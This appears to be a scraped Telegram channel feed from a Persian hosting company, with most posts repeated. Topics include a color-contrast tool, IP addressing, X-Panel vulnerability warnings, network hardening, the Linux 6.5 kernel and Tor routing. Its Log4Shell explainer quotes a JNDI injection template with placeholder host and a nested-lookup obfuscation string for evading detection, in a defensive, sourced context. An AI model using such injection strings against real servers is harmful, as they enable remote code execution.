#هوش_مصنوعی که بهت میگه متن و زمینت باید چه رنگی باشه👌
🔻 با استفاده از این هوش مصنوعی به راحتی هرچه تمام تر میتونید متوجه بشید که چه رنگی برای فونتون مناسبه ؛ و با توجه به پس زمینتون کدوم رنگ بیشتر بولد میشه.
1️⃣ فقط کافیه وارد این سایت بشید.
2️⃣ به پایین اسکرول کنید و گزینه Contrast checker
3️⃣ حالا تو پنل مربع بالا رنگ متن رو انتخاب میکنید و از مربع پایین هم رنگ پسزمینرو باید سلکت کنید.
4️⃣در نهایت خود سایت بر اساس تعداد ستاره و نمره ای که بهت میده میگه دوتا رنگی که انتخاب کردین چقدر خوانایی دارن باهم
💠 @one3erver
🔻 با استفاده از این هوش مصنوعی به راحتی هرچه تمام تر میتونید متوجه بشید که چه رنگی برای فونتون مناسبه ؛ و با توجه به پس زمینتون کدوم رنگ بیشتر بولد میشه.
1️⃣ فقط کافیه وارد این سایت بشید.
2️⃣ به پایین اسکرول کنید و گزینه Contrast checker
3️⃣ حالا تو پنل مربع بالا رنگ متن رو انتخاب میکنید و از مربع پایین هم رنگ پسزمینرو باید سلکت کنید.
4️⃣در نهایت خود سایت بر اساس تعداد ستاره و نمره ای که بهت میده میگه دوتا رنگی که انتخاب کردین چقدر خوانایی دارن باهم
💠 @one3erver
🔥3
جهنمی به نام Log4Shell !
در ۹ دسامبر، یک آسیبپذیری حیاتی RCE یا همان اجرای کد از راه دور در Log4J آپاچی، یک سیستم گزارشگیری و لاگ بسیار رایج که توسط توسعهدهندگان برنامههای وب و سرور مبتنی بر جاوا و سایر زبانهای برنامهنویسی استفاده میشود، آشکار شد. این آسیبپذیری در طیف گستردهای ( چند صد میلیون دستگاه) از سرویسها و برنامههای کاربردی روی سرورها را تحت تأثیر قرار میدهد و این مورد، آن را به شدت خطرناک و حساس میکند – و آخرین بهروزرسانیها برای آن برنامههای کاربردی روی سرور ضروری است.
برای درک نحوه کارکرد این اکسپلویت به دو عکس زیر نگاه کنید:
(ادامه در پست بعد)
💠 @one3erver
در ۹ دسامبر، یک آسیبپذیری حیاتی RCE یا همان اجرای کد از راه دور در Log4J آپاچی، یک سیستم گزارشگیری و لاگ بسیار رایج که توسط توسعهدهندگان برنامههای وب و سرور مبتنی بر جاوا و سایر زبانهای برنامهنویسی استفاده میشود، آشکار شد. این آسیبپذیری در طیف گستردهای ( چند صد میلیون دستگاه) از سرویسها و برنامههای کاربردی روی سرورها را تحت تأثیر قرار میدهد و این مورد، آن را به شدت خطرناک و حساس میکند – و آخرین بهروزرسانیها برای آن برنامههای کاربردی روی سرور ضروری است.
برای درک نحوه کارکرد این اکسپلویت به دو عکس زیر نگاه کنید:
(ادامه در پست بعد)
💠 @one3erver
💯2
شرح کارکرد اکسپلویت :
باگ در نسخه های قبلی Log4J ناشی از ویژگی به نام message lookup substitution است. وقتی فعال شود (که به طور پیشفرض قبل از رفع آسیب پذیری فعال بود)، Log4j رشتههایی را که به JNDI در منابعِ کانفیگِ پیامهای گزارش و پارامترهای ارسال شده توسط برنامهها ارجاع میدهند، شناسایی میکند.
از آنجایی که Log4J در URL های ارسال شده در این رشته ها sanitize را انجام نمیدهد، مهاجم می تواند با یک پیام حاوی رشته جایگزین با URL مربوط به یک سرور مخرب درخواست های مخرب را برای برنامه هایی ایجاد کند که از Log4J استفاده میکنند.
💠 @one3erver
باگ در نسخه های قبلی Log4J ناشی از ویژگی به نام message lookup substitution است. وقتی فعال شود (که به طور پیشفرض قبل از رفع آسیب پذیری فعال بود)، Log4j رشتههایی را که به JNDI در منابعِ کانفیگِ پیامهای گزارش و پارامترهای ارسال شده توسط برنامهها ارجاع میدهند، شناسایی میکند.
از آنجایی که Log4J در URL های ارسال شده در این رشته ها sanitize را انجام نمیدهد، مهاجم می تواند با یک پیام حاوی رشته جایگزین با URL مربوط به یک سرور مخرب درخواست های مخرب را برای برنامه هایی ایجاد کند که از Log4J استفاده میکنند.
💠 @one3erver
💯2
در مورد برنامههای کاربردی وب، رشته میتواند بخشی از هر بخش از یک ارتباط HTTP باشد که ثبت و به عنوان یک دستور جایگزین که به سرور مخرب ارجاع میدهد کانفیگ میشود :
${jndi:[protocol]://[remote server and code address]}
انواع مختلفی از روش های مبهم سازی برای جلوگیری از شناسایی اسکن یا اکسپلویت استفاده می شود، از جمله استفاده از رشته های تو در تو برای فراخوانی رابط مانند:
(${${::-j}${::-n}${::-d}${::-I})
هنگامی که به Log4J ارسال می شود، رشته جایگزین به عنوان یک خطا گرفته شده و URL پردازش می شود. سپس کد لاگر از URL موجود در کد درخواست را انجام داده و پاسخ serialize شده و به هکر برمیگردد- که می تواند منجر به اجرای کد ارسال شده از URL مخرب که مربوط به هکر است ، شود.
منابع :
https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/
💠 @one3erver
${jndi:[protocol]://[remote server and code address]}
انواع مختلفی از روش های مبهم سازی برای جلوگیری از شناسایی اسکن یا اکسپلویت استفاده می شود، از جمله استفاده از رشته های تو در تو برای فراخوانی رابط مانند:
(${${::-j}${::-n}${::-d}${::-I})
هنگامی که به Log4J ارسال می شود، رشته جایگزین به عنوان یک خطا گرفته شده و URL پردازش می شود. سپس کد لاگر از URL موجود در کد درخواست را انجام داده و پاسخ serialize شده و به هکر برمیگردد- که می تواند منجر به اجرای کد ارسال شده از URL مخرب که مربوط به هکر است ، شود.
منابع :
https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/
💠 @one3erver
💯3
با عرض سلام و وقت بخیر خدمت عزیزان
دوستان عزیز از وب سایت جدید وان سرور رونمایی شد. لطفا نظرات و انتقادات خود را به ایدی تلگرام زیر ارسال بفرماید
support: @One3erver_support_bot
Website: https://one3erver.com
با تشکر
دوستان عزیز از وب سایت جدید وان سرور رونمایی شد. لطفا نظرات و انتقادات خود را به ایدی تلگرام زیر ارسال بفرماید
support: @One3erver_support_bot
Website: https://one3erver.com
با تشکر
وان سرور | One3erver
فروش سرور مجازی، اختصاصی، هاستینگ و دامنه
فروش سرور مجازی | فروش سرور احتصاصی | فروش هاست | ثبت دامین | افزایش فالوور اینستاگرام | فروش پیج اینستاگرام | فروش سرور فول وارز | نمایندگی هاست
❤4🤩3
مقدماتی بر IP آدرس ها - بخش اول
درک IP پرایوت / Private :
تفاوت آیپی های public یا private چیست ؟
آدرس های آی پی به دو دسته Private (خصوصی) Public (عمومی) تقسیم بندی می شوند . آدرس های Public همان آدرس هایی هستند که در نهایت در اینترنت شناسه یک کامپیوتر خاص می شوند و معرف و شناسنامه یک کامپیوتر یا دیوایس خاص در دنیای Public است . ولی آی پی آدرس های Private چه هستند ؟ قبل توضیح اینکه این آدرس ها چه هستند و چگونه در دنیای اینترنت قابل دسترسی می شوند , بهتر است بدانیم که آنها در یک رنج خاصی تعریف شده هستند و بقیه آدرس ها به غیر از این رنج آدرس های Public را تشکیل خواهند داد .
رنج اول : 10.0.0.0
رنج دوم : 172.16.0.0 تا 172.31.0.0
رنج سوم : 192.168.0.0
(ادامه در پست پایین) :
💠 @one3erver
درک IP پرایوت / Private :
تفاوت آیپی های public یا private چیست ؟
آدرس های آی پی به دو دسته Private (خصوصی) Public (عمومی) تقسیم بندی می شوند . آدرس های Public همان آدرس هایی هستند که در نهایت در اینترنت شناسه یک کامپیوتر خاص می شوند و معرف و شناسنامه یک کامپیوتر یا دیوایس خاص در دنیای Public است . ولی آی پی آدرس های Private چه هستند ؟ قبل توضیح اینکه این آدرس ها چه هستند و چگونه در دنیای اینترنت قابل دسترسی می شوند , بهتر است بدانیم که آنها در یک رنج خاصی تعریف شده هستند و بقیه آدرس ها به غیر از این رنج آدرس های Public را تشکیل خواهند داد .
رنج اول : 10.0.0.0
رنج دوم : 172.16.0.0 تا 172.31.0.0
رنج سوم : 192.168.0.0
(ادامه در پست پایین) :
💠 @one3erver
❤5
به طور خلاصه به طور زیر میشود :
IP Address
----------
IPv4 --> 32Bit --> 0 or 1
XXX.XXX.XXX.XXX --> Octet = 8bit
A 1 - 126 | Subnet Mask : 255.0.0.0 /8 | 10.0.0.0 /8
B 128 - 191 | Subnet Mask : 255.255.0.0 /16 | 172.16.0.0 172.31.0.0
C 192 - 223 | Subnet Mask : 255.255.255.0 /24 | 192.168.0.0
Private IP Address
Public IP Address
NET ID / HOST ID
NET ID : Subnet Mask
💠 @one3erver
IP Address
----------
IPv4 --> 32Bit --> 0 or 1
XXX.XXX.XXX.XXX --> Octet = 8bit
A 1 - 126 | Subnet Mask : 255.0.0.0 /8 | 10.0.0.0 /8
B 128 - 191 | Subnet Mask : 255.255.0.0 /16 | 172.16.0.0 172.31.0.0
C 192 - 223 | Subnet Mask : 255.255.255.0 /24 | 192.168.0.0
Private IP Address
Public IP Address
NET ID / HOST ID
NET ID : Subnet Mask
💠 @one3erver
❤6
❌ هشدار هشدار ❌
اخیرا مشکلات امنیتی جدی ای در اسکریپت X Panel گزارش شده که از قرار زیر میباشد :
این اسکرپیت به دلیل باگ های امنیتی که در آن وجود دارد میشود به سرور شما حملات ddos انجام داد، و یا از سرور شما اقدام به ddos به سرور های دیگر نمود !
و طبیعتا امکان مسدودی سرور استفاده کننده از سمت دیتاسنتر وجود دارد.
💠 @one3erver
اخیرا مشکلات امنیتی جدی ای در اسکریپت X Panel گزارش شده که از قرار زیر میباشد :
این اسکرپیت به دلیل باگ های امنیتی که در آن وجود دارد میشود به سرور شما حملات ddos انجام داد، و یا از سرور شما اقدام به ddos به سرور های دیگر نمود !
و طبیعتا امکان مسدودی سرور استفاده کننده از سمت دیتاسنتر وجود دارد.
💠 @one3erver
😱5❤1
معرفی aapanel
محصول، شرکت، BaoTa می باشد.
پنل aapanel کنترل پنلی ساده و درعین حال قدرتمند است که میتواند وب سرور را به راحتی و از طریق رابط گرافیکی مبتنی بر وب (GUI) مدیریت کند. تا کاربران تنها برروی پروژه و کار خود تمرکز کنند و نیز راحت تر زمان خود را برای توسعه اهداف خود صرف کنند.
مهمترین ویژگیهای aapanel چیست ؟
همانطور که گفتیم aaPanel کنترل پنل مدیریت سروری است که از سیستمعامل لینوکس پشتیبانی میکند. این کنترل پنل به راحتی سرور را از طریق ترمینال وب مدیریت کرده و موجب بهینهسازی عملیاتها میشود. برخی از مهمترین ویژگیهای aaPanel عبارتند از:
💠ایجاد و مدیریت وبسایتها، FTP و دیتابیسها
💠مدیریت فایل تصویری
مدیریت نرمافزار بصری
💠مدیریتvisual CPU
💠مدیریت حافظه
💠مدیریت نمودار نظارت بر جریان
💠مدیریت وظایف زمانبندی شده
💠ارائه خدمات باز و بستهشدن SSH
💠تغییرات پورت SSH
💠انتشار پورت فایروال
💠مشاهده گزارش عملیات CPU، حافظه، IO دیسک
💠نظارت بر دادههای IO شبکه
سایت رسمی:
www.aapanel.com
💠 @one3erver
محصول، شرکت، BaoTa می باشد.
پنل aapanel کنترل پنلی ساده و درعین حال قدرتمند است که میتواند وب سرور را به راحتی و از طریق رابط گرافیکی مبتنی بر وب (GUI) مدیریت کند. تا کاربران تنها برروی پروژه و کار خود تمرکز کنند و نیز راحت تر زمان خود را برای توسعه اهداف خود صرف کنند.
مهمترین ویژگیهای aapanel چیست ؟
همانطور که گفتیم aaPanel کنترل پنل مدیریت سروری است که از سیستمعامل لینوکس پشتیبانی میکند. این کنترل پنل به راحتی سرور را از طریق ترمینال وب مدیریت کرده و موجب بهینهسازی عملیاتها میشود. برخی از مهمترین ویژگیهای aaPanel عبارتند از:
💠ایجاد و مدیریت وبسایتها، FTP و دیتابیسها
💠مدیریت فایل تصویری
مدیریت نرمافزار بصری
💠مدیریتvisual CPU
💠مدیریت حافظه
💠مدیریت نمودار نظارت بر جریان
💠مدیریت وظایف زمانبندی شده
💠ارائه خدمات باز و بستهشدن SSH
💠تغییرات پورت SSH
💠انتشار پورت فایروال
💠مشاهده گزارش عملیات CPU، حافظه، IO دیسک
💠نظارت بر دادههای IO شبکه
سایت رسمی:
www.aapanel.com
💠 @one3erver
❤5
🏃🏻♂️Faster Copy & Paste
💠مطمعناً زمانی بوده که نیاز داشتید چند متن رو در لیست کپی خود داشته باشید
که در روند جای گذاری مطالب سرعت بیشتری را تجربه کنید و در وقت خود
صرفه جویی قابل توجهی را کرده باشید اما مجبور به طی کردن مسیر تکراری بودین!
🔰شرکت مایکروسافت قابلیت ترکیبی قرار داده که با فشردن
کلید های windows + v
لیست مطلب کپی شده را نمایش میدهد که امکان پبن کردن موارد مهم را فراهم میکند!
💠 @one3erver
💠مطمعناً زمانی بوده که نیاز داشتید چند متن رو در لیست کپی خود داشته باشید
که در روند جای گذاری مطالب سرعت بیشتری را تجربه کنید و در وقت خود
صرفه جویی قابل توجهی را کرده باشید اما مجبور به طی کردن مسیر تکراری بودین!
🔰شرکت مایکروسافت قابلیت ترکیبی قرار داده که با فشردن
کلید های windows + v
لیست مطلب کپی شده را نمایش میدهد که امکان پبن کردن موارد مهم را فراهم میکند!
💠 @one3erver
⚡4❤1
#Security
🌐 چگونه ساختار شبکه سختافزاری خود را امن کنیم؟
#Step_1
📝استفاده از سوئيچهایی با ساختار سلسله مراتبی (Hierarchy)
در زمان طراحی شبکه، مناسب است جهت کنترل هر چه بیشتر بر روی تجهیزات موجود در شبکه، معماری سوییچهای شبکه به صورت لایهای باشد و در هر لایه سوییچ خاص آن لایه در نظر گرفته شود. به عنوان مثال با توجه به ساختار كلي شبكه در بالاترین لایه از سوئيچ لايه 3 Layer)Core) استفاده گردد و در لايه 2 (Distribution Layer) از سوئيچهایی که خاص لایه دو طراحی شدهاند استفاده گردد (مثل Cisco 2960). طرز كار اين سوئيچها در اين ساختار، جهت ايجاد امنيت و مديريت شبكه امكانات بيشتري در اختيار میگذارد.
💠 @one3erver
🌐 چگونه ساختار شبکه سختافزاری خود را امن کنیم؟
#Step_1
📝استفاده از سوئيچهایی با ساختار سلسله مراتبی (Hierarchy)
در زمان طراحی شبکه، مناسب است جهت کنترل هر چه بیشتر بر روی تجهیزات موجود در شبکه، معماری سوییچهای شبکه به صورت لایهای باشد و در هر لایه سوییچ خاص آن لایه در نظر گرفته شود. به عنوان مثال با توجه به ساختار كلي شبكه در بالاترین لایه از سوئيچ لايه 3 Layer)Core) استفاده گردد و در لايه 2 (Distribution Layer) از سوئيچهایی که خاص لایه دو طراحی شدهاند استفاده گردد (مثل Cisco 2960). طرز كار اين سوئيچها در اين ساختار، جهت ايجاد امنيت و مديريت شبكه امكانات بيشتري در اختيار میگذارد.
💠 @one3erver
🔥3❤1
🖌توییت یاشار شاهین زاده
دیروز توییت وحیدو دیدم که x-panel آسیبپذیری امنیتی داره، با امیر رفتیم روش و نتیجهای که رسیدیم: «سریعا فقط پاکش کنین». باگهای خیلی خطرناکی داره مثلا: رو سرور میشه دستور با سطح دسترسی Root اجرا کرد، کل User Pass کاربرا افشا میشه که در ادامه توضیح میدم ⬇️
https://youtu.be/yeVeJgCPc0s
یاشو🔗
💠 @one3erver
دیروز توییت وحیدو دیدم که x-panel آسیبپذیری امنیتی داره، با امیر رفتیم روش و نتیجهای که رسیدیم: «سریعا فقط پاکش کنین». باگهای خیلی خطرناکی داره مثلا: رو سرور میشه دستور با سطح دسترسی Root اجرا کرد، کل User Pass کاربرا افشا میشه که در ادامه توضیح میدم ⬇️
https://youtu.be/yeVeJgCPc0s
یاشو🔗
💠 @one3erver
YouTube
All XPanels are prone to RCE
بچهها اگه از این پنل استفاده میکنین سریعا پاکش کنین
https://github.com/Alirezad07/X-Panel-SSH-User-Management
رشتوی توضیحات فنی:
https://twitter.com/voorivex/status/1678487975179481093
https://github.com/Alirezad07/X-Panel-SSH-User-Management
رشتوی توضیحات فنی:
https://twitter.com/voorivex/status/1678487975179481093
👍2🤯2❤1
#Security
🌐 چگونه ساختار شبکه سخت افزاری خود را امن کنیم؟
#Step_2
📝 عدم به كارگيري VTP Domain
توصيه ميشود كه در صورت امکان، تنظيمات vlan ها را بر روي سوئيچ ها به صورت دستي انجام داده و از اين پروتكل استفاده نكرد. لذا مي بايست VTP روي سوئيچ ها غير فعال شود. در اين روش تمامی سوئیچها عضو این Domain میباشند. سوئيچ core در ModeServer و بقیه سوئیچها در Client Mode کار میکنند. ضمناً VTP Password نيز جهت جلوگيري از حملات از نوع سوئيچينگ بايد در نظر گرفته شود.
💠 @one3erver
🌐 چگونه ساختار شبکه سخت افزاری خود را امن کنیم؟
#Step_2
📝 عدم به كارگيري VTP Domain
توصيه ميشود كه در صورت امکان، تنظيمات vlan ها را بر روي سوئيچ ها به صورت دستي انجام داده و از اين پروتكل استفاده نكرد. لذا مي بايست VTP روي سوئيچ ها غير فعال شود. در اين روش تمامی سوئیچها عضو این Domain میباشند. سوئيچ core در ModeServer و بقیه سوئیچها در Client Mode کار میکنند. ضمناً VTP Password نيز جهت جلوگيري از حملات از نوع سوئيچينگ بايد در نظر گرفته شود.
💠 @one3erver
❤2👾2
#Security
🌐 چگونه ساختار شبکه سخت افزاری خود را امن کنیم؟
#Step_3
📝 استفاده از(Vlan ( Virtual Local Area Network
به منظور كنترل دسترسي در يك شبكه به صورت مجازي از اين روش استفاده مي شود و مي توان قسمت هاي مختلف در شبكه سازمان را به منظور دسترسي داشتن به يكديگر در يك vlan قرار داد تا بتوانند با يكديگر تبادل اطلاعات داشته و از طرفي بخش هايي كه در اين vlan قرار ندارند، مجاز به دسترسي به آن نيستند.
🔰معمولا براي اعمل محدوديت هاي بيشتر بهتر است سرور ها در يك vlan مجزا و سوئيچ ها نيز در يك vlan مجزا قرار گيرند و با ACL ها دسترسي بين vlanها را برقرار نمود.
🔰در صورت امكان client هايي كه مي خواهند به اينترنت متصل شوند در يك vlan قرار گيرند.
💠 @one3erver
🌐 چگونه ساختار شبکه سخت افزاری خود را امن کنیم؟
#Step_3
📝 استفاده از(Vlan ( Virtual Local Area Network
به منظور كنترل دسترسي در يك شبكه به صورت مجازي از اين روش استفاده مي شود و مي توان قسمت هاي مختلف در شبكه سازمان را به منظور دسترسي داشتن به يكديگر در يك vlan قرار داد تا بتوانند با يكديگر تبادل اطلاعات داشته و از طرفي بخش هايي كه در اين vlan قرار ندارند، مجاز به دسترسي به آن نيستند.
🔰معمولا براي اعمل محدوديت هاي بيشتر بهتر است سرور ها در يك vlan مجزا و سوئيچ ها نيز در يك vlan مجزا قرار گيرند و با ACL ها دسترسي بين vlanها را برقرار نمود.
🔰در صورت امكان client هايي كه مي خواهند به اينترنت متصل شوند در يك vlan قرار گيرند.
💠 @one3erver
👍2
صفحه رسمی وان سرور در Threads برای دوستان در دسترس قرار گرفت❤️
باعث افتخار ماست که میزبان شما در این شبکه اجتماعی باشیم❤️
https://www.threads.net/@one3erver
باعث افتخار ماست که میزبان شما در این شبکه اجتماعی باشیم❤️
https://www.threads.net/@one3erver
❤3💯1💔1
با توجه به اعلام Linus Torvalds کرنل 6.5 بزودی منتشر می شود. کلی ویژگی جدید اضافه و بهبود های مختلفی انجام شده
برخی ویژگی ها
1-Parallel CPU boot support
2-Better NTFS3 support
3-UEFI unaccepted memory support
4-AMDGPU/Radeon/AMDKFD kernel drivers
5-Secure erase
6-USB4 v2 support
7-Better sensor monitoring
8-KVM Guest Snapshots
💠@one3erver
برخی ویژگی ها
1-Parallel CPU boot support
2-Better NTFS3 support
3-UEFI unaccepted memory support
4-AMDGPU/Radeon/AMDKFD kernel drivers
5-Secure erase
6-USB4 v2 support
7-Better sensor monitoring
8-KVM Guest Snapshots
💠@one3erver
👍3❤1
مبحث شبکه های پیازی یا Tor (تور)
ما در دوره ی دیتا های آزاد زندگی می کنیم ، جایی که هر کسی که دسترسی به ارتباط اینترنتی دارد تمامی اطلاعاتش در جهان به مانند اثر انگشتش وجود دارد .
چگونه Tor پاسخ ، مرور ایمن را دارد؟
مسیر یابی پیازی دو جنبه مهم دارد. اول ، شبکه Tor از داوطلبانی تشکیل شده است که از رایانه های خود به عنوان گره یا Node استفاده می کنند. در طول مرور های عادی . اطلاعات بین اینترنت درون پکت ها عبور میکند. زمانی که یک کاربر Tor یک وبسایت را بازدید می کند. اگر پکت های آنها به طور مستقیم به سرور انتقال داده نمیشود در عوض ،Tor مسیری را از طریق node های اختصاص داده شده تصادفی ایجاد می کند که بسته قبل از رسیدن به سرور آن را دنبال می کند.
جنبه مهم دیگر مسیریابی پیازی ، نحوه ساخت بسته ها است. به طور معمول ، بسته ها شامل آدرس فرستنده و مقصد هستند. در هنگام استفاده از Tor ، بسته ها در یک لایه ، مانند عروسک های تودرتو پیچیده می شوند.
ادامه در پست پایین :
💠 @one3erver
ما در دوره ی دیتا های آزاد زندگی می کنیم ، جایی که هر کسی که دسترسی به ارتباط اینترنتی دارد تمامی اطلاعاتش در جهان به مانند اثر انگشتش وجود دارد .
چگونه Tor پاسخ ، مرور ایمن را دارد؟
مسیر یابی پیازی دو جنبه مهم دارد. اول ، شبکه Tor از داوطلبانی تشکیل شده است که از رایانه های خود به عنوان گره یا Node استفاده می کنند. در طول مرور های عادی . اطلاعات بین اینترنت درون پکت ها عبور میکند. زمانی که یک کاربر Tor یک وبسایت را بازدید می کند. اگر پکت های آنها به طور مستقیم به سرور انتقال داده نمیشود در عوض ،Tor مسیری را از طریق node های اختصاص داده شده تصادفی ایجاد می کند که بسته قبل از رسیدن به سرور آن را دنبال می کند.
جنبه مهم دیگر مسیریابی پیازی ، نحوه ساخت بسته ها است. به طور معمول ، بسته ها شامل آدرس فرستنده و مقصد هستند. در هنگام استفاده از Tor ، بسته ها در یک لایه ، مانند عروسک های تودرتو پیچیده می شوند.
ادامه در پست پایین :
💠 @one3erver
👍2🔥2❤1
زمانی که کاربر پکت را ارسال می کند. لایه ی بالایی به مسیر یاب میگوید آن به مسیریاب یا Router A برود. اولین توقف. وقتی آن در آنجا هست . مسیر یاب A اولین لایه را بر می دارد. لایه ی بعدی به روتر A دستور می دهد تا پکت را به مسیر یاب B بفرستد.
مسیریاب (روتر) A مقصد نهایی را نمی داند . فقط آن پکت از کاربر می آید و به B می رود. روتر B پوسته ی لایه ی بعد را بر میدارد . و آنرا به پایین خط یعنی روتر C می فرستد . و این پروسه ادامه دارد تا زمانی که پیام به مقصد نهایی می رسد.
در هر توقف ، Node فقط آخرین مکان بسته (پکت) را می داند و همچنین مکان بعدی را. هیچ نودی (Node) مسیر کامل داده را ثبت نمی کند ، و همچنین کسی که پیام را مشاهده می کند ، با فرض تنظیمات صحیح سه سرور اول شما ، ضبط نمی شود.
توجه داشته باشید که در پست های بعدی حتما به مواردی چون دسترسی به دیپ وب و سایت های موجود در آن خواهیم پرداخت !
💠 @one3erver
https://one3erver.com/%D8%B4%D8%A8%DA%A9%D9%87-%D9%87%D8%A7%DB%8C-%D9%BE%DB%8C%D8%A7%D8%B2%DB%8C-tor
مسیریاب (روتر) A مقصد نهایی را نمی داند . فقط آن پکت از کاربر می آید و به B می رود. روتر B پوسته ی لایه ی بعد را بر میدارد . و آنرا به پایین خط یعنی روتر C می فرستد . و این پروسه ادامه دارد تا زمانی که پیام به مقصد نهایی می رسد.
در هر توقف ، Node فقط آخرین مکان بسته (پکت) را می داند و همچنین مکان بعدی را. هیچ نودی (Node) مسیر کامل داده را ثبت نمی کند ، و همچنین کسی که پیام را مشاهده می کند ، با فرض تنظیمات صحیح سه سرور اول شما ، ضبط نمی شود.
توجه داشته باشید که در پست های بعدی حتما به مواردی چون دسترسی به دیپ وب و سایت های موجود در آن خواهیم پرداخت !
💠 @one3erver
https://one3erver.com/%D8%B4%D8%A8%DA%A9%D9%87-%D9%87%D8%A7%DB%8C-%D9%BE%DB%8C%D8%A7%D8%B2%DB%8C-tor
🔥2👍1🤩1